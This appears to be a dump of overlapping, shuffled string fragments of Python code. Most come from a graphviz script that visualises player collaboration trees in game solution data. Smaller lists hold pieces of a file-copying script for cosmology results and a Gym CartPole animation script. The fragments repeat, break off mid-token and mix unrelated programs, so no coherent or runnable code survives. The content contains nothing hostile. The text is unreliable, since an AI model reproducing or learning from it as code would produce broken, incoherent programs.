evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))),", "s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = []", "\"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # do", "p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid)", "\"evol\" + str(i) raise ValueError(\"evolver pdb {} not found in any evolver lines", "uid, g in uid_grouped} # further group by source evolved_targets = {target for", "d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves", "style=\"dashed\" if min(e.energy for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] =", "uid_source_grouped = { uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e:", "= col_to_str(c) groups_uids = {gid: [uid for _, uid in g] for gid,", "return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1]", "structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p", "e: e.uid), lambda e: e.uid) # uid_source_grouped = { # uid: {k: min(g,", "remove_corrupted(pdb_infos): return [x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data):", "= groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group by evolver uid_source_grouped", "for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for", "{}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for l", "args = parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30)", "= {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda", "* (p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']),", "'2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid", "shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s:", "pdb {} not found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def", "* 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions']", "p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if", "in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _,", "# group by evolver uid_source_grouped = { uid: {k: list(g) for k, g", "# for sg in evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time", "is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid'] ==", "-xC {} | dot | gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname,", "edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) / (end -", "c) for c in cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\",", "e.uid) # group by evolver uid_source_grouped = { uid: {k: list(g) for k,", "uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for", "[])) # map gids to colors cdict = {} # gids = set([xs[0].gid", "lambda e: e.uid) # uid_source_grouped = { # uid: {k: min(g, key=lambda p:", "min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight", "pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves,", "gid, uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors =", "= parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as", "evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values():", "i += 1 return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0]", "# # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)})", "Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids else [], {c.name: c.energy", "or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def col_to_str(col): return '#'", "= { uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)),", "in pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs in", "'2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1", "== 0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) # map", "or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p in pdl) def", "d: [(x.gid, x.uid) for x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid)", "lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors =", "p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid,", "c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'},", "uid_grouped} # further group by source evolved_targets = {target for targets in uid_source_grouped.values()", "zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _, uid", "uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) #", "key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in", "# 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in", "colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids)", "gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class", "and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup):", "= {gid: [uid for _, uid in g] for gid, g in groupby(", "root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for", "subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{} | neato -Tpng -n2", "line in enumerate(lines): sids = [p.sid for p in line.pdb_infos] if s.sid in", "active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20')", "else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) #", "command line graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname,", "p.energy) in evolved: shape = \"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid)", "a shared solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e:", "target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True", "collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids else [],", "int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs", "source evolved_targets = {target for targets in uid_source_grouped.values() for target in targets} roots", "with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled',", "evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid)", "float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag:", "roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid,", "map gids to colors cdict = {} # gids = set([xs[0].gid for xs", "True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # do it again, this", "if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster)", "if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves =", "r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\",", "d: [x for x in d if int(x.sharing_gid) == 0 and x.scoretype ==", "\"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype == '1' or is_corrupted(p.pdl,", "int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] ==", "= min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9", "shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) #", "fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp for e", "get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid in data.pid.unique(): logging.debug(\"getting team structures", "uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c)", "in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true',", "{}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:]", "'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label':", "return [x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors", "= user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids", "edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) / (end -", "p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {})", "= list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on", "| neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid:", "from util import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict import", "people who just loaded in a shared solution but didn't do anything #", "# dot.subgraph(sg) # nodes and edges for shared solutions for uid, pdbs in", "in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy", "def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = [] for", "for sg in evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time for", "-> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source =", "in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid:", "uid, g in # uid_grouped if uid not in active_uids} # screen out", "in enumerate(lines): sids = [p.sid for p in line.pdb_infos] if s.sid in sids:", "p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda", "render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid) df = data[data.pid ==", "cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for gid, c", "uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver", "'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids}", "nodes and edges for shared solutions for uid, pdbs in shared.items(): gid =", "PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info,", "get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped} # further group by", "ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in pdbs: if get_tag(pdb)", "children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid in data.pid.unique(): logging.debug(\"getting", "# evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for", "# lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid", "in targets} roots = sum(([p for p in pdbs if p.scoretype == '1'", "e: e.uid), lambda e: e.uid) # group by evolver uid_source_grouped = { uid:", "if uid not in active_uids} # screen out anyone who later actively evolved", "source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) ->", "c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\",", "for pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb),", "for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for", "to colors cdict = {} # gids = set([xs[0].gid for xs in shared.values()]", "round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'],", "for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag,", "str: if s.scoretype == \"1\": return s.uid for i, line in enumerate(lines): sids", "if args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as pool: pool.map(render_collab,", "in evolves))) # evoling_start = min(e.timestamp for e in evolves) # edge_color =", "in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator,", "- start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid,", "lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d", "== '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, uids in", "= Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters", "'actions'])]), []))), lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {}", "-> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines:", "collabs[pid] = [] for root in roots: tag = get_tag(root) sids = get_relevant_sids(root,", "evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for", "groups_uids} evolved = {} # create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves,", "get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) /", "r.lines for p in l.pdb_infos] if r.lines else []) + ([p for l", "= df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p", "evolver uid_source_grouped = { uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda", "([p for l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []),", "== '0' or p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return", "e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group by source", "sum(([p for p in pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets]", "for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p for p", "fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed')", "# c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)]", "graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} # create evolver nodes", "c.weight for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab)", "and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d", "source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4))", "# graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets in uid_source_grouped.items():", "just loaded in a shared solution but didn't do anything # uid_grouped =", "np import matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor", "len(front) > 0: # ntab, cur = front.pop() # print(\" \"*ntab, cur.tag) #", "'1' and get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag:", "who later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape':", "for l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []), key=lambda", "prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color", "[]), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x", "# evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) #", "{uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb,", "x in d if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves,", "0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid']", "if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves =", "in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in", "for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs in", "evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', #", "import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score']", "colorsys import subprocess import argparse import os import csv import json import logging", "in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for", "evoling_start = min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 +", "uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped = {", "key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] =", "\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs", "out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{} | neato -Tpng", "in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target,", "# ntab, cur = front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1,", "[(1, c) for c in collab.children] # while len(front) > 0: # ntab,", "get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x:", "list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d", "sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared solutions for", "\"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style':", "= { uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'],", "shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp for e in", "'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape", "g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in", "found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab:", "uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda", "and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x", "color in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert", "l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid," ]
[ "prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename,", "idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename) print(path) #", "import shutil prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename=", "os import shutil prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path)", "in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename) print(path) # os.rename(prepath_in+str(idx)+'.err',", "range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename) print(path) # os.rename(prepath_in+str(idx)+'.err', prepath_out+str(idx)+'/EUCLID_GridPlot_56234229_'+str(idx)+'.err')", "prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename)", "import os import shutil prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/'", "shutil prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db')", "for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename) print(path)" ]
[ "# /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import animation # from", "patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50)", "frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0])", "参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import animation", "gym import numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL", "list of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch", "import animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a list", "frames = [] env = gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array'))", "# framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info = env.step(action)", "def display_frames_as_gif(frames): \"\"\" Displays a list of frames as a gif, with controls", "with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i])", "animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames", "import display def display_frames_as_gif(frames): \"\"\" Displays a list of frames as a gif,", "np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb #", "# from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a list of frames", "JSAnimation.IPython_display import display_animation from matplotlib import animation # from IPython.display import display def", "= animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす", "[] env = gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく", "matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display", "def animate(i): patch.set_data(frames[i]) anim = 